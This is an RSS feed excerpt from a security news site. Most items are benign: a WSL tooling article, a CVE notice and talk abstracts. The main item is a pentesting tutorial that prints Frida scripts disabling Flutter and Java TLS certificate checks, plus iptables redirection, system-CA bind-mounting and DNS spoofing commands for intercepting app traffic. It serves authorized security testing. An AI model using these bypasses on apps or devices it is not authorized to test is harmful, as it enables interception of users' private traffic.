<p>With WSL installed, you can use <a href="https://github.com/microsoft/WindowsDeveloperConfig/blob/main/wsl-comfort/readme.md">the WSL Comfort scripts</a> to install additional tools and customize Windows Terminal. This is a two-part tool. The Windows part ensures WSL and Ubuntu are installed and sets up fonts and terminal profiles. The Linux part then tunes the WSL environment, with the option of switching to zsh and using <a href="https://starship.rs/">the starship terminal display tools</a>. It then adds a series of popular CLIs and support for the Homebrew package installer. You don’t need to install a new Linux distribution in WSL; you can target your existing Ubuntu instance.</p>



<p>The result is a developer-focused WSL installation with much of the required configuration already installed, along with the basis of a Linux development toolchain — including some of my favorite tools that are already part of my default install. With this new script I don’t have to install them manually (and configure necessary apt repositories); it’s all automated.</p>



<p>The underlying winget configuration tools can be used to prepare your development PC for specific workloads. These are installed in a workload directory and set up your environment to work with your choice of platforms. This way you can have all the tools you need to work with TypeScript or Java ready to go. Some of the workload installers download a lot of resources. If you’re setting up for WinUI 3 development, for example, be prepared to download several gigabytes of Visual Studio and the Windows Application SDK. This will take time and will overload a machine or VM without the required space.</p>



<p>There are a lot of tools here, with more on the way. The roadmap includes plugins for the Windows PowerToys command palette, putting Windows Dev Config a few keystrokes away from your desktop. Microsoft is finally filling one of Windows’ missing pieces, providing a quick and easy way to build a developer-ready environment that can be customized to work the way you want. For development teams, these tools enable the consistency across environments needed to share code and ideas, along with being able to pick any keyboard and start working without having to worry about the time needed to learn someone else’s setup.</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Minecraft 26.3 already has a first snapshot out with the Dappled Forest Biome]]></title>
<description><![CDATA[Minecraft Java Edition 26.2 'Chaos Cubed' only recently launched, and Mojang are already smacking those keys to hook us up with more new content.Read the full article on GamingOnLinux.]]></description>
<link>https://tsecurity.de/de/3623697/linux-tipps/minecraft-263-already-has-a-first-snapshot-out-with-the-dappled-forest-biome/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623697/linux-tipps/minecraft-263-already-has-a-first-snapshot-out-with-the-dappled-forest-biome/</guid>
<pubDate>Thu, 25 Jun 2026 09:36:33 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Minecraft Java Edition 26.2 'Chaos Cubed' only recently launched, and Mojang are already smacking those keys to hook us up with more new content.<p><img src="https://www.gamingonlinux.com/uploads/articles/tagline_images/1787784072id29277gol.webp" alt></p><p>Read the full article on <a href="https://www.gamingonlinux.com/2026/06/minecraft-26-3-already-has-a-first-snapshot-out-with-the-dappled-forest-biome/">GamingOnLinux</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-38935 | NiterForum 2.5.0-beta SsoApi.java privilege escalation (Issue 25 / EUVD-2022-41482)]]></title>
<description><![CDATA[A vulnerability was found in NiterForum 2.5.0-beta. It has been rated as critical. Affected is an unknown function of the file /src/main/java/cn/niter/forum/api/SsoApi.java. The manipulation leads to privilege escalation.

This vulnerability is referenced as CVE-2022-38935. The attack needs to be...]]></description>
<link>https://tsecurity.de/de/3623444/sicherheitsluecken/cve-2022-38935-niterforum-250-beta-ssoapijava-privilege-escalation-issue-25-euvd-2022-41482/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623444/sicherheitsluecken/cve-2022-38935-niterforum-250-beta-ssoapijava-privilege-escalation-issue-25-euvd-2022-41482/</guid>
<pubDate>Thu, 25 Jun 2026 07:38:13 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/niterforum">NiterForum 2.5.0-beta</a>. It has been rated as <a href="https://vuldb.com/kb/risk">critical</a>. Affected is an unknown function of the file <em>/src/main/java/cn/niter/forum/api/SsoApi.java</em>. The manipulation leads to privilege escalation.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2022-38935">CVE-2022-38935</a>. The attack needs to be initiated within the local network. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[RoshanOS 4 – Improved MX Linux + KDE Build Aimed at Beginners Switching from Windows]]></title>
<description><![CDATA[Hi r/linux, Over the years I've released a few versions of RoshanOS. I know the Linux community is generally skeptical of new respins — and with good reason. Honest context on earlier versions: RoshanOS 1 and 1.1 were based on Linux Mint and built using the older Systemback tool.  RoshanOS 4 (rel...]]></description>
<link>https://tsecurity.de/de/3623265/linux-tipps/roshanos-4-improved-mx-linux-kde-build-aimed-at-beginners-switching-from-windows/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623265/linux-tipps/roshanos-4-improved-mx-linux-kde-build-aimed-at-beginners-switching-from-windows/</guid>
<pubDate>Thu, 25 Jun 2026 05:09:36 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hi <a href="https://www.reddit.com/r/linux">r/linux</a>,</p> <p>Over the years I've released a few versions of RoshanOS. I know the Linux community is generally skeptical of new respins — and with good reason.</p> <p>Honest context on earlier versions:<br> RoshanOS 1 and 1.1 were based on Linux Mint and built using the older Systemback tool. </p> <p>RoshanOS 4 (released May 2026) is a full rebuild:</p> <ul> <li>Base: Current MX Linux (Debian Stable) with its solid tooling and long-term support</li> <li>Desktop: KDE Plasma</li> <li>Build process: Using MX Snapshot (MX Tools) </li> <li>Size: ~5.6 GB ISO</li> </ul> <h1>Notable changes &amp; features:</h1> <ul> <li>Much improved hardware portability thanks to proper remastering</li> <li>Pre-configured programming tryouts (Python, C/C++, Java, etc.)</li> <li>Screen edge gestures and other KDE workflow tweaks</li> <li>Pro edition with additional support layers for Windows and Android apps</li> <li>Comprehensive included documentation</li> </ul> <p>This is not positioned as a replacement for mainstream or minimalist distros. It’s my attempt at a polished, productive daily driver with a curated selection of packages on a reliable base.</p> <p>I’m posting mainly to get technical feedback from experienced users. If you try the live session, I’d appreciate notes on stability, hardware behavior, packaging choices, or anything that stands out (good or bad).</p> <p>Links:</p> <ul> <li>DistroWatch: <a href="https://distrowatch.com/roshanos">https://distrowatch.com/roshanos</a></li> </ul> <p>Thanks for any time you spend looking at it.</p> <p>(asakpke – RoshanTech)</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/asakpke"> /u/asakpke </a> <br> <span><a href="https://i.redd.it/tyuzuwd0dc9h1.png">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1uexta1/roshanos_4_improved_mx_linux_kde_build_aimed_at/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Black Hat Europe 2025 | Stress-Testing SAST And LLMs On Modern Web Backends]]></title>
<description><![CDATA[Author: Black Hat - Bewertung: 0x - Views:2 Modern backends aren't C or legacy Java. They're FastAPI/Flask/Django and Express/NestJS/Next.js. Yet we still judge detection tools with sink-centric, synthetic benchmarks that ignore framework semantics. We built the Unsafe Code Detection Benchmark, a...]]></description>
<link>https://tsecurity.de/de/3622943/it-security-video/black-hat-europe-2025-stress-testing-sast-and-llms-on-modern-web-backends/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622943/it-security-video/black-hat-europe-2025-stress-testing-sast-and-llms-on-modern-web-backends/</guid>
<pubDate>Thu, 25 Jun 2026 00:03:37 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Black Hat - Bewertung: 0x - Views:2 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/0v3pnoR8IyY?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Modern backends aren't C or legacy Java. They're FastAPI/Flask/Django and Express/NestJS/Next.js. Yet we still judge detection tools with sink-centric, synthetic benchmarks that ignore framework semantics. We built the Unsafe Code Detection Benchmark, a reproducible way to score both SAST and LLMs on intentionally vulnerable, minimal micro-apps across today's web frameworks.<br />
<br />
Our benchmark couples an open corpus with a single harness, unified ground truth and a failure-mode taxonomy mapped to CWE/OWASP. It measures precision/recall and cost/latency, controls for prompt/temperature variance and includes "appears-vulnerable-but-safe" scenarios to stress false-positives.<br />
<br />
Initial results may surprise: on source-proximate issues common in modern stacks (parameter merging/polllution, middleware/decorator-order authz bypasses, subtle type coercion), state-of-the-art general purpose LLMs outperform industry leading SASTs in their default configuration – a gap we trace to weak framework awareness and imprecise source modeling. The twist: with simple, framework-aware custom rules SAST surpasses LLMs, showing why deterministic, organization-specific rules remain a force multiplier. LLMs provide strong raw recall but exhibit prompt sensitivity and a tendency to conflate stylistic "best practices" with real vulnerabilities.<br />
<br />
Attendees will leave with a practical methodology and tooling to evaluate their own SAST and LLMs on modern stacks, concrete guidance to raise real-world detection rates and a lear path to extend and rerun the benchmark internally. We will release the benchmark specification, the harness for running selected SAST tools and LLMs as well as the open-source corpus.<br />
<br />
By: <br />
Andrew Konstantinov  |  Security Engineer<br />
Irina Iarlykanova  |  Student<br />
<br />
https://blackhat.com/eu-25/briefings/schedule/?#unsafe-code-detection-benchmark-stress-testing-sast-and-llms-on-modern-web-backends-49293<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[From Idea to JEP: An OpenJDK Developer’s Journey to Improve Profiling (gpn24)]]></title>
<description><![CDATA[OpenJDK is the main project behind Java and already has a profiler for performance assessment. But till recently, it wasn't a good one. So four years ago, only weeks into my first job, I decided to change that. But guess what: Getting a big feature into OpenJDK/Java's runtime isn't as easy as I t...]]></description>
<link>https://tsecurity.de/de/3622520/it-security-video/from-idea-to-jep-an-openjdk-developers-journey-to-improve-profiling-gpn24/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622520/it-security-video/from-idea-to-jep-an-openjdk-developers-journey-to-improve-profiling-gpn24/</guid>
<pubDate>Wed, 24 Jun 2026 20:49:29 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[OpenJDK is the main project behind Java and already has a profiler for performance assessment. But till recently, it wasn't a good one. So four years ago, only weeks into my first job, I decided to change that. But guess what: Getting a big feature into OpenJDK/Java's runtime isn't as easy as I thought.

In this talk, I chronicle my journey of getting a new profiler into JDK 25. It's a tale of blood, sweat, and C++.

Licensed to the public under https://creativecommons.org/licenses/by/4.0/
about this event: https://cfp.gulas.ch/gpn24/talk/9MNRXX/]]></content:encoded>
</item>
<item>
<title><![CDATA[Three Languages, Triple the Confusion (gpn24)]]></title>
<description><![CDATA[This code runs without errors, but still confuses. In this talk, we explore some subtle quirks of C, Python, and Java (and others) that catch even experienced developers off guard. No bugs, no typos - just the language doing exactly what it was designed to do.

Licensed to the public under https:...]]></description>
<link>https://tsecurity.de/de/3622496/it-security-video/three-languages-triple-the-confusion-gpn24/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622496/it-security-video/three-languages-triple-the-confusion-gpn24/</guid>
<pubDate>Wed, 24 Jun 2026 20:48:59 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[This code runs without errors, but still confuses. In this talk, we explore some subtle quirks of C, Python, and Java (and others) that catch even experienced developers off guard. No bugs, no typos - just the language doing exactly what it was designed to do.

Licensed to the public under https://creativecommons.org/licenses/by/4.0/
about this event: https://cfp.gulas.ch/gpn24/talk/HZ8XUT/]]></content:encoded>
</item>
<item>
<title><![CDATA[I Wasted 3 Days Intercepting a Flutter App. Here’s What Actually Works.]]></title>
<description><![CDATA[Three days. That’s how long it took me to get Burp Suite seeing traffic from a Flutter app during a security assessment.I tried everything I knew. Objection. ReFlutter, which actually patches the Flutter binary itself. Custom CA installation. VPN-based interception. Standard Frida SSL bypass scri...]]></description>
<link>https://tsecurity.de/de/3621794/hacking/i-wasted-3-days-intercepting-a-flutter-app-heres-what-actually-works/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621794/hacking/i-wasted-3-days-intercepting-a-flutter-app-heres-what-actually-works/</guid>
<pubDate>Wed, 24 Jun 2026 16:55:14 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*K8PC8q14WKtGzOCpXufO_g.png"></figure><p>Three days. That’s how long it took me to get Burp Suite seeing traffic from a Flutter app during a security assessment.</p><p>I tried everything I knew. Objection. ReFlutter, which actually patches the Flutter binary itself. Custom CA installation. VPN-based interception. Standard Frida SSL bypass scripts from GitHub. Each one either failed silently or gave me the exact same result: app opens, appears to load, shows “no internet.” Not an SSL error. Not a certificate warning. Just “no internet,” like the proxy wasn’t even there.</p><p>At some point I stopped trying individual tools and started asking a different question: what is actually happening at each layer, and why is patching one thing not enough? That’s when things started making sense.</p><p>What eventually worked wasn’t a new tool or a clever trick. It was running all the right hooks at the same time, covering every SSL validation path the app could be using. I put those together into two scripts. That’s what this post is about.</p><h3>Why Flutter Makes This Harder Than It Should Be</h3><p>Most Android SSL bypass guides assume Java or Kotlin. Flutter is built differently.</p><p>Flutter ships its own TLS implementation, BoringSSL, compiled directly into libflutter.so. It has nothing to do with Android's certificate trust chain. Installing Burp's CA through Settings, the first thing every guide tells you to do, has zero effect on Flutter's networking. The app just doesn't use that trust store.</p><p>That’s the first problem. The second one is subtler. Even if you patch Flutter’s TLS correctly, some apps run a connectivity check through a Java or WebView layer before Flutter even initializes. That check goes through Android’s certificate chain, which on API 24 and above won’t trust user-installed CAs. So the Flutter bypass works, the Flutter layer is satisfied, and the app still shows “no internet” because the Java layer already rejected the connection a few milliseconds earlier.</p><p>This is exactly why ReFlutter wasn’t enough. It patches the Flutter binary, full stop. If anything is happening outside Flutter, in Java or WebView, ReFlutter never touches it.</p><p>Covering one layer doesn’t work. You have to cover all of them.</p><h3>The Scripts</h3><h3>Script 1: disable-flutter-tls-v1.js</h3><p>This one handles the Flutter TLS layer.</p><p>Flutter’s BoringSSL has a function called ssl_verify_peer_cert in handshake.cc that does the actual peer certificate verification. The script finds this function in memory using byte pattern matching. It has patterns for arm64, arm, x64, and x86 across both Android and iOS. Once it finds the function, it replaces the implementation with one that always returns 0, meaning every certificate passes without any check.</p><pre>function hook_ssl_verify_peer_cert(address) {<br>    Interceptor.replace(address, new NativeCallback((pathPtr, flags) =&gt; {<br>        return 0;<br>    }, 'int', ['pointer', 'int']));<br>}</pre><p>There’s a timing problem that causes silent failures on a lot of devices. Frida attaches to the process before libflutter.so finishes loading. Pattern matching runs, finds nothing, exits cleanly, and you see no error, but the bypass never actually happened. The script handles this by retrying up to five times with a one-second delay between attempts. Once the library is found, the retry counter resets so the pattern search also gets its full number of attempts.</p><h3>Script 2: universal_bypass.js</h3><p>This one covers everything in the Java layer, outside Flutter’s Dart runtime.</p><p><strong>X509TrustManager</strong> is Android’s standard interface for certificate validation. The script registers a custom implementation where checkClientTrusted, checkServerTrusted, and getAcceptedIssuers are all empty. No certificate chain ever gets checked.</p><pre>var TrustManager = Java.registerClass({<br>    name: 'com.burp.bypass.TrustManager',<br>    implements: [X509TrustManager],<br>    methods: {<br>        checkClientTrusted: function(chain, authType) {},<br>        checkServerTrusted: function(chain, authType) {},<br>        getAcceptedIssuers: function() { return []; }<br>    }<br>});</pre><p><strong>SSLContext.init()</strong> gets hooked so that every SSL context created anywhere in the app, including inside third-party libraries, gets the bypass trust manager injected into it at initialization time.</p><p><strong>HostnameVerifier</strong> is hooked to return true for every hostname. Some apps validate the server hostname as a completely separate step from certificate validation. Without this, you can pass the certificate check and still get blocked.</p><p><strong>WebViewClient.onReceivedSslError</strong> calls handler.proceed() instead of showing an error page. Without this, any WebView inside the app will just stop loading when Burp intercepts the connection.</p><p><strong>InAppWebViewClient</strong> is the hook that was missing from every existing script I found. Apps using the flutter_inappwebview plugin register their own WebView client subclass at com.pichillilorenzo.flutter_inappwebview_android.webview.in_app_webview.InAppWebViewClient. Hooking the parent WebViewClient class does nothing for this subclass. You have to hook it by its full name specifically.</p><pre>try {<br>    var InAppWebViewClient = Java.use('com.pichillilorenzo.flutter_inappwebview_android.webview.in_app_webview.InAppWebViewClient');<br>    InAppWebViewClient.onReceivedSslError.implementation = function(view, handler, error) {<br>        handler.proceed();<br>    };<br>} catch(e) {<br>    console.log("[-] InAppWebView not present: " + e);<br>}</pre><p>The try/catch exists because if the app doesn’t use flutter_inappwebview, that class simply doesn’t exist. A bare Java.use() call on a missing class crashes the entire script before any other hook runs. The catch keeps everything else alive.</p><h3>Running both scripts</h3><pre>frida -U -f com.your.app.package -l ./disable-flutter-tls-v1.js -l ./universal_bypass.js</pre><p>If the app freezes after launch, type %resume in the Frida REPL to unpause it. If you attached to an already running process, skip this — there's nothing to resume.</p><p>Watch the output. The Flutter script will log which byte pattern matched and at what address. The Java script logs each hook as it fires. Traffic should start showing up in Burp within a few seconds of the app making its first network request.</p><p>On most Flutter apps I’ve tested, this is enough. Try it before going any further.</p><h3>When the Scripts Are Not Enough</h3><p>A small number of apps ignore system routing or have extra checks at the network level. For those, you need the traffic path set up correctly underneath the scripts.</p><h3>Burp Invisible Proxy</h3><p>When iptables redirects traffic to Burp, the app sends raw TCP directly, no CONNECT handshake. Without invisible proxy mode, Burp doesn’t know how to handle this and logs “Client request violates HTTP protocol” while showing nothing in Intercept.</p><p>Go to Proxy, then Proxy Listeners, select your listener, click Edit, go to Request handling, and enable Support invisible proxying. Leave Redirect to host empty.</p><p>Also worth checking: make sure Burp is actually binding to all interfaces.</p><pre>netstat -an | grep 8080<br># 0.0.0.0:8080 is correct. 127.0.0.1:8080 means the emulator can't reach it.</pre><h3>iptables Traffic Redirection</h3><p>Flutter apps make direct TCP connections and ignore Android’s proxy settings entirely. iptables handles the redirect at the kernel level, rewriting the destination address before the packet leaves the device.</p><pre>adb reverse --remove-all<br>adb shell su -c 'iptables -t nat -F'</pre><pre>adb shell su -c 'iptables -t nat -A OUTPUT -p tcp --dport 443 -j DNAT --to-destination 10.0.2.2:8080'<br>adb shell su -c 'iptables -t nat -A OUTPUT -p tcp --dport 80 -j DNAT --to-destination 10.0.2.2:8080'</pre><pre>adb shell su -c 'iptables -t nat -L -n -v'</pre><p>Always flush before adding rules. Duplicate DNAT entries stack silently and the routing behavior they produce is not obvious.</p><h3>Burp’s CA as a System Certificate</h3><p>If there’s Java-level certificate validation that Frida doesn’t catch in time, Burp’s CA needs to be in the system store. User-installed certificates are ignored on API 24 and above. The bind mount approach gets around the read-only partition:</p><pre>openssl x509 -inform DER -in cacert.der -out cacert.pem<br>openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1<br># e.g. 9a5ba575, so the file must be named 9a5ba575.0</pre><pre>adb shell su -c 'cp -a /system/etc/security/cacerts /data/local/tmp/system_cacerts'<br>adb push cacert.pem /data/local/tmp/system_cacerts/<br>adb shell su -c 'mv /data/local/tmp/system_cacerts/cacert.pem /data/local/tmp/system_cacerts/9a5ba575.0'<br>adb shell su -c 'chmod 644 /data/local/tmp/system_cacerts/9a5ba575.0'<br>adb shell su -c 'mount -o bind /data/local/tmp/system_cacerts /system/etc/security/cacerts'</pre><h3>DNSChef: When iptables Still Isn’t Enough</h3><p>On a handful of apps, even the full iptables setup wasn’t getting traffic into Burp. The tell was tcpdump: packets were leaving the device on port 443 going somewhere other than Burp. The app was doing something at the network level that DNAT wasn’t catching.</p><p><a href="https://github.com/iphelix/dnschef">DNSChef</a> takes a completely different approach. Instead of redirecting traffic after DNS resolution happens, you intercept the DNS resolution itself. Point the device’s DNS server at your machine, run DNSChef to answer every query with your IP, and the app’s traffic arrives at Burp before iptables even has to act.</p><pre>adb shell settings put global dns1 &lt;your-machine-ip&gt;<br>adb shell settings put global dns2 &lt;your-machine-ip&gt;</pre><pre>sudo python dnschef.py --fakeip &lt;your-machine-ip&gt; --interface &lt;your-machine-ip&gt;</pre><p>Then run the Frida scripts on top:</p><pre>frida -U -f com.your.app.package -l ./disable-flutter-tls-v1.js -l ./universal_bypass.js</pre><p>If the app freezes, type %resume in the REPL. Skip it if you attached to a running process.</p><p>With everything running, the app resolves its backend domain and gets your machine’s IP back. It sends HTTPS there. Burp picks it up in invisible proxy mode. Frida has already patched TLS validation so the app accepts Burp’s certificate. The app has no visibility into any of it.</p><p>I’ve needed this combination maybe twice. Both times tcpdump was what showed me why iptables alone wasn’t doing it.</p><h3>If Things Still Aren’t Working</h3><p>Check the Burp Event Log before assuming the scripts failed. “Failed to negotiate TLS connection” means the CA isn’t trusted, so run the scripts or use the bind mount. “Client request violates HTTP protocol” means invisible proxy isn’t on. If the Event Log shows nothing at all, traffic isn’t reaching Burp, and tcpdump will tell you where it’s actually going.</p><pre>adb shell su -c 'tcpdump -i any -n port 443'</pre><h3>To Wrap Up</h3><p>The two scripts cover the vast majority of Flutter apps on their own. The InAppWebViewClient hook is the part that was missing from everything else I found. If you’ve tried other bypass scripts and WebView traffic is still getting blocked, that subclass hook is probably why they didn’t work.</p><p>The rest of this post, iptables, bind mount, DNSChef, exists for edge cases. I needed those setups occasionally. You might not need them at all.</p><p>I spent three days on this. Hopefully you won’t have to.</p><h3>Credits and Prior Work</h3><p>These scripts are a compilation. The Flutter TLS patch comes from NVISOsecurity’s disable-flutter-tls-verification project. The Java-layer hooks — X509TrustManager, SSLContext, HostnameVerifier, WebViewClient — are standard Frida patterns that have been around for years and exist in various forms across dozens of public scripts. The InAppWebViewClient hook is the one addition I put together after hitting that specific problem myself and not finding it handled anywhere else.</p><p>I collected what was scattered, tested what actually worked, and put it in two files. That’s it.</p><p><em>Scripts: </em><a href="https://github.com/Ar-baaz/Universal-SSL-Bypass-Script-for-Flutter-Apps"><em>github.com/Ar-baaz/Universal-SSL-Bypass-Script-for-Flutter-Apps</em></a></p><p><em>DNSChef: </em><a href="https://github.com/iphelix/dnschef"><em>github.com/iphelix/dnschef</em></a></p><p><em>For authorized security testing or your own apps only.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=d3e9a4816818" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/i-wasted-3-days-intercepting-a-flutter-app-heres-what-actually-works-d3e9a4816818">I Wasted 3 Days Intercepting a Flutter App. Here’s What Actually Works.</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,89ms -->